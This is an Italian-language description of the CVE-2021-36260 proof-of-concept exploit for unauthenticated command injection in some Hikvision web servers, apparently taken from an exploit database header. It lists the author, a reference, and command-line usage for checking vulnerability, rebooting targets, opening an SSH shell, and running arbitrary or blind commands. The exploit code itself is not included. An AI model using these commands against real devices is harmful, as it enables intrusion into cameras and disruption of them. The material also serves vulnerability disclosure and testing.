
Vulnerabilità di iniezione di comandi nel web server di alcuni prodotti Hikvision. A causa di una validazione dell'input insufficiente, un attaccante può sfruttare la vulnerabilità per lanciare un attacco di iniezione di comandi inviando alcuni messaggi con comandi malevoli.
CVE-2021-36260 POC vulnerabilità di command injection nel web server di alcuni prodotti Hikvision. A causa di una validazione dell'input insufficiente, un attaccante può sfruttare la vulnerabilità per lanciare un attacco di command injection inviando messaggi con comandi malevoli.
Titolo dell'exploit: Hikvision Web Server Build 210702 - Command Injection
Autore dell'exploit: bashis
Homepage del fornitore: https://www.hikvision.com/
Versione: 1.0
CVE: CVE-2021-36260
Riferimento: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Nota:
[Esempi] Controllo di vulnerabilità/verifica sicura: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Controllo di vulnerabilità/verifica sicuro e non sicuro: (utilizzerà il 'controllo non sicuro' solo se non verificato con il 'controllo sicuro') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Controllo di vulnerabilità/verifica non sicuro: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Avvia e connetti a una shell SSH: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Esegui comando: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Esegui comando alla cieca: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"